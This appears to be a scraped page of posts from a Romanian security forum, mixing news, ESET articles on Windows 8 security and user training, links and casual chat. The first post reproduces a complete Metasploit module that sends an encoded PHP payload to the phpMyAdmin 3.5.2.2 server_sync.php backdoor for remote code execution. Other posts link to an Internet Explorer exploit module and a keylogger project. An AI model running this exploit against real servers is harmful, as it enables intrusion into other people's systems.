Nytro

[h=1]phpMyAdmin 3.5.2.2 server_sync.php Backdoor[/h] ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited 'Space' => 262144, # 256k }, 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DisclosureDate' => 'Sep 25 2012', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin']) ], self.class) end def exploit uris = [] tpath = datastore['PATH'] if tpath[-1,1] == '/' tpath = tpath.chop end pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%") res = send_request_raw( { 'global' => true, 'uri' => tpath + "/server_sync.php", 'method' => 'POST', 'data' => pdata, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => pdata.length, } }, 1.0) handler end end Sursa: phpMyAdmin 3.5.2.2 server_sync.php Backdoor

Microsoft Internet Explorer execCommand Use-After-Free Vulnerability Modul Metasploit Download: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/aac41e91fd38f99238971892d61ead4cfbedabb4/entry/modules/exploits/windows/browser/ie_execcommand_uaf.rb

Haide bre, nimic nu e gratis. Desi nu platiti bani pentru serviciile folosite, platiti cu informatii personale, interese... lucruri care prin "business intelligence" devin profitabile pentru Google: reclame, statistici...

Futu-va-n gura, ii speriati pe tineri

https://www.youtube.com/watch?v=fMhgTVlKoTk&feature=related

Eu nu am primit avertisment :">

The amount of stupid posts is too damn high...

"Organizatorul are dreptul s? publice, s? promoveze ?i s? foloseasc? în campanii de marketing aplica?iile dezvoltate de concuren?i la eveniment, concuren?ii exprimându-?i prin înscrierea la evenimnet acordul expres în aceast? privin??. Publicarea, promovarea ?i utilizarea aplica?iilor dezvoltate în cadrul evenimentului se face de c?tre organizator f?r? obliga?ia de a remunera în orice fel participan?ii. Organizatorul are dreptul s? publice con?inutul aplica?iilor dezvoltate, precum ?i numele persoanelor care au dezvoltat aplica?iile respective." Posibil sa apar pe acolo.

[h=1]Overview of VoIP and Voice Over IP Concepts October 10, 2012[/h] Streamed live on Oct 10, 2012 by elithecomputerguy In this Daily Blob Eli the Computer Guy talks about VoIP and how it works. Youtube:

Windows 8: FUD* for thought *Fear, Uncertainty, Doubt Aryeh Goretsky, MVP, ZCSE Table of contents Introduction 3 Defender of the faith 4 Giving rootkits the boot 5 Nuts and bolts 6 Microsoft draws a line in the silicon 7 Sending criminals on the ELAM 8 To mend and defend 9 The evolution of evil 9 Attacking Windows 8 10 Social engineering: a hidden flaw? 10 Sensory (mis)perception 10 Developers: the new targets of opportunity? 11 Summing it all up/Windows 8 by the numbers 12 Author bio 14 About ESET 14 Introduction In September of 2011, Microsoft released the first public preview of Windows 8, the next generation of their flagship desktop operating system, at the BUILD Developer Conference 1, 2. Despite a flurry of pre-Microsoft leaks, interest in Windows 8 remained high, and the official release of the Windows 8 Developer Preview received a groundswell of attention in blogs, articles and elsewhere. A subsequent release, titled Consumer Preview, was released at the end of February 2012. While it contained some GUI changes, such as removal of the Start button from the taskbar, most of the changes to it were internal. Three months later, at the end of May, the Release Preview of Microsoft Windows 8 was released, with the user interface, feature set and APIs being close to (if not already) final. Much of the interest in Windows 8 focuses on cosmetic changes, such as the new modern Windows 8 interface (formerly known as the Metro user interface) and replacement of the Start Menu with the Start Screen, but substantial improvements have been made to Windows security, as well. In this white paper, we will look at some of these changes, and what they mean to Windows 8’s users. Defender of the faith One of the most widely discussed features of Windows 8 is the inclusion of Windows Defender with the new operating system. While this is not a new tool—Windows Defender has been included with all versions of Windows since Vista was released in 2005—previous versions of Windows Defender were limited to protecting users against spyware. The version of Windows Defender included with Windows 8 is actually a rebadged version of Microsoft Security Essentials, which has led at least one prominent journalist to predict the end of antivirus software, or at least those from third parties 3. If that refrain sounds familiar, it may be because you have heard it before: similar predictions were bandied about when it was announced that Windows Vista would include Windows Defender 4, 5, 6 and a raft of new security features, such as User Account Control 7, a Microsoft implementation of a least-privilege model for users. Windows Defender as included with Windows 8 is a good product and does, in fact, provide a decent level of protection, especially when compared against other free anti-malware programs. However, Windows Defender does not contain many of the advanced features and functions of paid-for solutions, such as a high level of granularity for threat detection, task scheduling, centralized management and reporting and so forth. As with other free anti-malware programs, support options for Windows Defender are limited. Many new computers purchased with Windows 8, however, will not have Windows Defender installed as their default antimalware program. Many computer manufacturers ship their computers with a trial version of a commercial anti-malware program installed on them. This is because those manufacturers receive payments from the anti-malware vendors to preload the software onto the computers they sell 8. Computer manufacturers also receive a royalty when the computer user purchases a license for the trial product, and when the license is renewed. While the amount of revenue this generates from each individual is not huge—perhaps $15-to-30 USD—when multiplied over tens or hundreds of thousands of computers, it becomes millions of dollars in revenue that computer manufacturers get from anti-malware companies. Microsoft has made it easy for computer manufacturers to disable Windows Defender so that they may continue to receive payments from antimalware vendors in exchange for bundling their anti-malware software 9, 10, 11. ------------------------------------------------------------------ Download: http://go.eset.com/us/resources/white-papers/ESETNA_WP-Windows8-FUD.pdf

Study finds 90 percent have no recent cybersecurity training Veniti la Defcamp: https://rstcenter.com/forum/60027-defcamp-2012-bucuresti-30-noiembrie-2-decembrie.rst by Stephen Cobb ESET Security Evangelist A new study finds that only 1 in 10 consumers have had any classes or training about protecting their computer and/or their personal information during the last 12 months. Indeed, a shocking 68 percent say they have never had any such training, ever. These and other findings, first revealed by ESET at the Virus Bulletin conference in Dallas, come just in time for National Cyber Security Awareness Month. In our ongoing efforts to better understand the information security challenges that we, as a society, now face, ESET asked a cross-section of computer users several security-related questions. The most worrying findings? Only 1 in 10 people who regularly use a computer or other digital device to connect to the Internet have received any kind of cyber security training in the last 12 months, and more than two thirds have never had any such training. That 68/32 split you see in the pie chart rang a bell with us because it mirrored a different ESET poll, conducted by Harris earlier this year. The purpose of that poll was to study implications of the bring-your-own-device or BYOD trend. We asked employed U.S. adults if they had received any kind of computer security training from their employer and only 32 percent said they had. Another 64 percent said they had not and 4 percent said they couldn’t recall having such training, which probably means it was not worth remembering. Clearly, with two separate surveys indicating that under a third of Internet users have had security training, we could be doing a much better job of educating employees and consumers about cybersecurity. More cyber-security training needed, and needed now While the total number of people in our latest survey who received no training was disappointing, things appear even worse when you take a closer look. Most of those who got training received it more than 12 months ago. Given the rate at which new threats emerge, and new defensive behaviors are needed, finding that only 10% had received any security training in the last 12 months was very disappointing. Here is the full breakdown of responses to the question: “Have you ever had any classes or training about protecting your computer and/or your personal information?” No training ever: 68% Yes, in last 12 months: 10% Yes 1-2 years ago: 5% Yes, 3-5 years ago: 5.5% More than 5 years ago: 11.5% Frankly, I find these numbers alarming in their implications for cybersecurity, the protection of the data streams that have become the lifeblood of our digital economy and our nation’s critical infrastructure. These findings also cast doubt on the perennial assertion by some experts that security problems mainly arise from the stupidity of users. In light of these survey results it is worth asking whether the stupidity lies more with those who expect to achieve system security without providing any education on the subject to the people who use the systems. During the evolution of computer security over the last 20 years there has been a persistent hope that security was a problem that could be solved technologically, therefore saving us the trouble of educating computer users about security. Clearly, that has not happened and, ironically, the improvements made in security technology have actually shifted the point of attack to users. Consider two current trends: 1. 64-bit malware: As my colleague Aleksandr Matrosov pointed out his analysis of the Rovnix bootkit framework, the task of writing malicious code that can successfully exploit 64-bit systems is getting harder. At the same time, marketing projections tell us that more and more systems will be 64-bit, a growing obstacle for cyber-criminals. 2. Gateways to control applications: Both Apple and Microsoft are looking to restrict the installation of applications by end users in order to control the quality, and legitimacy, of application code. Users will need additional persuading (or social engineering) in order for malware to circumvent these controls. The implications of these two trends? People who seek to profit from unauthorized access to our data and systems will be forced, increasingly, to try to exploit human vulnerability. Tricking users into compromising their systems (and other systems to which they then connect) will be increasingly important as an attack vector. And that means the case for arming all computer using humans with security training is stronger than ever. Sadly, these survey results suggest there is a ton of work to do before we can hope to achieve that goal. In the next installment of statistics from our recent survey we will explore consumer knowledge of cybersecurity in the absence of widespread training and look at some of the educational initiatives ESET is working on. In the meantime, please explore all that is going on in October for National Cyber Security Awareness Month. For example, you might want to point friends and family to the cybersecurity training modules that ESET has made available free of charge to Internet users in North America for the month of October. Sursa: Study finds 90 percent have no recent cybersecurity training | ESET ThreatBlog

"Finally, the virus will overwrite the master boot record of the system to prevent it from booting." Nu cred ca erau romani, ai nostri stiu doar ./scan sau Copy/Paste ?id=123 in Havij si apasa pe un buton. "A group named "Cutting Sword of Justice" claimed responsibility for an attack on 30,000 Saudi Aramco workstations" Suna a grupare de romani? Nu mi se pare. Si cred ca e nasol, ca picam de fraieri...

*Moderator

Super, multi baieti "buni" pe acolo.

Sitting is Killing You - Medical Billing and Coding Certification

Versiunea inceputa 4.0 si neterminata e pe la Programare, codul sursa, comentat. Nu mai am timp si chef de astfel de prostioare. Edit: https://rstcenter.com/forum/23850-vb6-digital-keylogger-v4-0-proiect-inceput.rst

Avea ban si datele de contact sterse.

Ma pis pe corectarile voastre gramaticale. Ho.

Daca are user si pass nu are nevoie de vreo aplicatie ca sa posteze. Pur si simplu "simuleaza" postarea (dupa logare).

Geniala ideea

Info: TinKode Gets 2-Year Suspended Jail Term, Ordered to Pay $120,000 (€93,000) - Softpedia Reopened. Continuati aici.

Nu ai nevoie de API, doar trimite request-urile HTTP necesare ca si cum utilizatorul in sine ar posta. 1. Logare 2. Postare Pastrezi cookie dupa logare, si ai grija sa trimiti datele corecte, sunt niste campuri dubioase pe acolo.

Aia e o porcarie. Cu experimenteul Philadelphia e altceva, acei oameni au fost supusi la doze extrem de mari de unde electro-magnetice (asta era experimentul) si multi au murit, unora li s-a facut rau si au inceput sa vada tot felul de prostii, halucinatii.

Eu, logic. Firefox, Internet Explorer, Word, Excel, PowerPoint, Yahoo! Messenger, Winamp, Adobe Reader, Flash Player... Cam tot ce se poate.